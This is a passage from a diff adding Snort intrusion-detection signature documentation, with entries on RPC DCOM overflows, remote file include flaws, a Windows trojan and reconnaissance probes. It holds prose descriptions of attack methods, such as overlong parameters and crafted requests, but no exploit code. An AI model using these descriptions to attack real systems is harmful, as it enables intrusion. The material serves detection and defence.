+	YaBB SE YaBB SE 1.4.1
+	YaBB SE YaBB SE 1.5 .0
+
+--
+Attack Scenarios:
+An attacker can make a request to an affected script and supply their
+own code in the packer.php script.
+
+--
+Ease of Attack:
+Simple. No exploit software required. Exploit code exists.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1264.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+1264
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) bootparam is listening.
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port bootparam is using.  Attackers can also learn what versions of the bootparam protocol are accepted by bootparam.
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as bootparam run.  The bootparam RPC service is used by some diskless workstations to discover information from a server required to boot.  The client will issue a bootparam whoami request to the server.  The server response will include the Network Information Systems (NIS) domain name.  An attacker can send a bootparam request if no authentication is used. The domain name provides valuable information that can be used to break into an NIS environment.  
+
+--
+Affected Systems:
+Any host running bootparam with no authentication.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where bootparam runs.  This may be a precursor to accessing bootparam.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access bootparam, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for bootparam, not probes of the bootparam service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the bootparam service itself. An attacker may attempt to go directly to the bootparam port without querying the portmapper service which, would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0647
+
+Arachnids 
+http://www.whitehats.com/info/IDS16
+
+
+--
--- /dev/null
+++ b/doc/signatures/1898.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid: 1898
+
+--
+Summary:
+This event is generated when an attempt is made to exploit 
+vulnerable versions of the Kerberos version 4 administration daemon 
+(kadmind).
+
+--
+Impact:
+Serious. System compromize presenting the attacker with the opportunity to execute arbitrary code or gain unauthorized access to the target host along with other hosts in the kerberos realm.
+
+--
+Detailed Information:
+kadmind is used to administer a Kerberos database on the master key distribution center (KDC) of a kerberos realm.
+
+A buffer overflow condition exists in kadmind4 such that when the daemon parses a length value in an administration request the attacker can gain the ability to execute arbitrary code with the privileges of the user running the daemon, usually root.
+
+Authentication is not required to cause the overflow.
+
+Affected Systems:
+	Multiple vendors using kadmind version 4
+
+--
+Attack Scenarios:
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2002-29.html
+http://www.kb.cert.org/vuls/id/875073
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1235
+
+--
--- /dev/null
+++ b/doc/signatures/477.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+
+Sid:
+477
+
+--
+
+Summary:
+This event is generated when a network host generates an ICMP source quench
+datagram.
+
+--
+
+Impact:
+ICMP source quench message are generated by gateway devices that no longer
+have the buffer space needed to queue datagrams for output to the next route.
+This could be an indication of a routing problem, network capacity problem, 
+or on going Denial of Service attack.
+
+--
+
+Detailed Information:
+ICMP source quench messasges are generated when a gateway device runs out
+of buffer space to process incoming network traffic.  This is an informational
+message that is generated in an attempt to inform the remote host generating
+the traffic to limit the speed at which it is sending network traffic to
+the remote host.
+
+--
+
+Attack Scenarios:
+Denial of Service.  Attackers could potenially use ICMP source quench datagrams
+to rate limit a remote host that listens to unsolicited ICMP source quench 
+datagrams.   
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of datagram.
+
+--
+
+False Positives:
+Legitimate source quench datagrams will trigger this rule.
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Use ingress filtering to block incoming ICMP source quench datagrams.
+
+--
+
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+http://www.whitehats.com/info/IDS238
+
+
+--
--- /dev/null
+++ b/doc/signatures/2652.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+2652
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in many
+useful tasks.  The "offline_og.begin_load" procedure is used for
+offline instantiation of master groups.  This procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "gname" variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck632.html
+
+--
--- /dev/null
+++ b/doc/signatures/517.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+517
+
+--
+Summary:
+This event is generated when an attempt is made to query the XDMCP 
+service.
+
+--
+Impact:
+Serious. Information disclosure. Unauthorized access to the system.
+
+--
+Detailed Information:
+An XDMCP query can provide a wealth of information about a host such as 
+a login screen, a list of users on the host, and to bypass access 
+control restrictions used by tcpwrapper and to bypass the restriction of
+login by user "root" on the box.
+
+--
+Affected Systems:
+	Any UNIX based server running XDMCP.
+
+--
+Attack Scenarios:
+An attacker can use this to find out information about the machine and 
+then either launch a specific attack or connect to the X windows server 
+using XDMCP.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disable XDMCP if not needed.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Josh Sakofsky
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS476
+
+--
--- /dev/null
+++ b/doc/signatures/703.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+703
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft SQL.
+
+--
+Impact:
+Information gathering and data integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to an implementation of Microsoft SQL server or client.  This can
+lead to unauthorized access and possibly escalated privileges to that of 
+the administrator. Data stored on the machine can be compromised and 
+trust relationships between the victim server and other hosts can be 
+exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/162.txt
@@ -0,0 +1,85 @@
+Rule:
+
+--
+Sid:
+162
+
+--
+Summary:
+Matrix is a Trojan Horse offering the attacker the ability to upload 
+files to, and download files from the victim host.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources the machine is connected to.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows NT
+	Windows 2000
+	Windows XP
+
+The Trojan changes system registry settings to add the Matrix server
+to programs normally started on boot. Due to the nature of this Trojan
+it is unlikely that the attacker's client IP address has been spoofed.
+
+Matrix is based on the Girlfriend Trojan, see sid 145.
+
+The default name of the server application is Wincfg.exe
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise can be in the form of a Win32 installation program that may
+use the extension ".jpg" or ".bmp" when delivered via e-mail for
+example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+Updated virus definition files are essential in detecting this Trojan.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Edit the system registry to remove the extra keys or restore a
+previously known good copy of the registry.
+
+Affected registry keys are:
+
+HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
+
+Registry keys added 
+
+Wincfg.exe ="<DRIVE>:\WINDOWS\Wincfg.exe"
+
+A reboot of the infected machine is recommended.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS83
+
+--
--- /dev/null
+++ b/doc/signatures/111-9.txt
@@ -0,0 +1,58 @@
+Rule: 
+
+--
+Sid: 
+111-9
+
+-- 
+Summary: 
+This event is generated when the pre-processor stream4
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+This may indicate scanning activity.
+
+--
+Detailed Information:
+The pre-processor stream4 has detected network traffic that may indicate
+a NULL scan is in progress. That is, packets without any flags set have
+been detected. This should not occur in normal TCP data transmissions.
+
+--
+Affected Systems:
+	All systems
+
+--
+Attack Scenarios: 
+An attacker may utilize scanning techniques to determine possible points
+of exploitation against a host.
+
+-- 
+Ease of Attack: 
+Simple. Many scanning tools exist.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+Corrective Action:
+Check the target host for signs of compromise.
+
+Ensure the system is up to date with any appropriate vendor supplied patches.
+
+--
+Contributors:
+Martin Roesch <roesch@sourcefire.com>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2130.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 2130
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a weakness in a host running Microsoft Internet Information Server (IIS) using the IISProtect web administration interface. 
+
+--
+Impact:
+Administrator access and arbitrary command execution.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a weakness in a host running the IISProtect web administration interface. A vulnerability exists that can allow an attacker to inject SQL code of his choice into the application.
+
+The attacker may be trying to gain administrator access to the host, garner information on users of the system, retrieve sensitive information or be attempting to execute arbitrary code.
+
+--
+Affected Systems:
+Any host using IIS with the IISProtect web administration interface.
+
+--
+Attack Scenarios:
+An attacker may inject SQL code of his choice. The attacker might then gain administrator access to the host or database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/7675
+
+--
--- /dev/null
+++ b/doc/signatures/3393.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3393
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2562.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+2562
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a vulnerability
+associated with the server component of McAfee's ePolicy Orchestrator (ePO).
+
+--
+Impact:
+A successful attack may permit an attacker to upload malicious code on
+the ePolicy Orchestrator server that may subsequently deliver the
+malicious code to ePolicy agents.
+
+--
+Detailed Information:
+There is a problem with access authentication in McAfee's ePolicy Orchestrator
+server.  This product is responsible for distributing packages and code to
+ePolicy agents, making this a potentially widespread and damaging attack in
+a network.  Because of a failure to authenticate credentials,
+an attacker can perform administrator functions, such as file uploads, by
+connecting the ePO web server.  The malicious files may be pushed to
+the ePO agents by the ePO Orchestrator.
+
+--
+Affected Systems:
+McAfee ePolicy Orchestrator 2.5.0
+McAfee ePolicy Orchestrator 2.5.1 before Patch 14
+McAfee ePolicy Orchestrator 3.0 before Patch 4 for 2.0 SP2A
+
+--
+Attack Scenarios:
+An attacker can attempt to upload a malicious file using the web
+server of the ePO Orchestrator. The file may be subsequently
+pushed by the Orchestrator to ePO agents.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+If a valid administrator connects to the ePO server and uploads
+files, the alert will trigger.
+
+--
+False Negatives:
+If the ePO server listens on a port other than 81, no alert will
+trigger.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+CVE:
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0038
+
+Bugtraq:
+http://www.securityfocus.com/bid/10200
+
+--
--- /dev/null
+++ b/doc/signatures/100000604.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000604
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "inv_send.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "inv_send.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2165.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+2165
+
+
+--
+Summary:
+This event is generated when a possible outgoing virus is detected. 
+
+--
+Impact:
+Informational event. An virus on an infected host may be attempting to 
+propogate.
+
+--
+Detailed Information:
+This event indicates that an outgoing email message possibly containing 
+a virus has been detected.
+
+This rule generates an event when a filename extension commonly used by 
+viruses is detected.
+
+--
+Affected Systems:
+Any host.
+
+--
+Attack Scenarios:
+This is indicative of a virus infection.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A legitimate attachment to an email may generate this event.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of virus infection.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/1772.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+1772
+
+--
+Summary:
+This event is generated when an attempt is made to access the
+pbserver.dll component associated with the Microsoft Phone Book Service. 
+
+--
+Impact:
+Remote access. Malicious access of the pbserver.dll component can allow
+the execution of arbitrary commands on a vulnerable server.
+
+--
+Detailed Information:
+The Microsoft Phone Book Service allows dial-in clients to download
+phone book updates from the Internet Information Server (IIS) running
+the Phone Book Service.  The pbserver.dll is the Internet Services
+Application Programming Interface (ISAPI) that implements the update
+service.  A buffer overflow exists in pbserver.dll that may permit the
+execution of arbitrary commands on the server. 
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows 2000 Server
+
+--
+Attack Scenarios:
+An attacker can craft an HTTP request for a phone book update to a host
+running the Phone Book Service.
+
+--
+Ease of Attack:
+Simple. Exploit code is available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Delete pbserver.dll if the Phone Book Service is unnecessary. 
+
+Apply the appropriate vendor supplied patches.
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/384.txt
@@ -0,0 +1,53 @@
+Rule:
+
+--
+Sid:
+384
+
+--
+Summary:
+This event is generated when an generic ICMP echo request is made.
+
+--
+Impact:
+Information gathering.  An ICMP echo request can determine if a host is active.
+
+--
+Detailed Information:
+An ICMP echo request is used by the ping command to elicit an ICMP echo reply from a listening live host.  This rule alerts on a generic ICMP request where no payload is included in the message or the payload does not match more specific rules. 
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker may attempt to determine live hosts in a network prior to launching an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+An ICMP echo request may be used to legimately troubleshoot networking problems.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP echo requests.
+
+--
+Contributors:
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000389.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000389
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ovidentia" application running on a webserver. Access to the file "approb.php" using a remote file being passed as the "babInstallPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "babInstallPath" parameter in the "approb.php" script used by the "Ovidentia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ovidentia
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000139.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid: 
+100000139
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known 
+vulnerability in Microsoft Internet Information Server (IIS).
+
+-- 
+Impact: 
+Serious. Information Disclosure, application source code may be disclosed.
+
+--
+Detailed Information:
+A programming error in an error page for Microsoft IIS may result in the 
+discloure of asp code disclosure on an affected system.
+
+By making a request to a server using a modified SERVER_NAME variable, the 
+underlying asp code is displayed in the error page returned to the requestor if 
+the asp page generates an error.
+
+--
+Affected Systems:
+Microsoft IIS 6.0 and prior
+
+--
+Attack Scenarios: 
+An attacker can make a request to the server and modify the SERVER_NAME 
+variable to be either localhost or 127.0.0.1, if the page returns an error the 
+asp code is revealed.
+
+-- 
+Ease of Attack: 
+Simple. Exploit code exists.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors: 
+Original Rule writer rmkml <rmkml@free.fr>
+Sourcefire Vulnerability Research Team
+Alex Kirk <akirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2366.txt
@@ -0,0 +1,59 @@
+Rule:  
+
+--
+Sid:
+2366
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the PHP web application PhpGedView.
+
+--
+Impact:
+Execution of arbitrary code on the affected system
+
+--
+Detailed Information:
+PhpGedView contains a flaw such that it may be possible for an attacker
+to include code of their choosing by manipulating the PGV_BASE_DIRECTORY
+parameter when making a GET or POST  request to a vulnerable system.
+
+It may be possible for an attacker to execute that code with the
+privileges of the user running the webserver, usually root.
+
+--
+Affected Systems:
+	PhpGedView 2.65.1 and earlier
+--
+Attack Scenarios:
+An attacker can make a request to an affected script and define their
+own path to the PGV_BASE_DIRECTORY variable.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2530.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+2530
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3379.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3379
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000642.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000642
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "template_modify_file.php" using a remote file being passed 
+as the "admin_template_path" parameter may indicate that an exploitation 
+attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"template_modify_file.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/3268.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3268
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
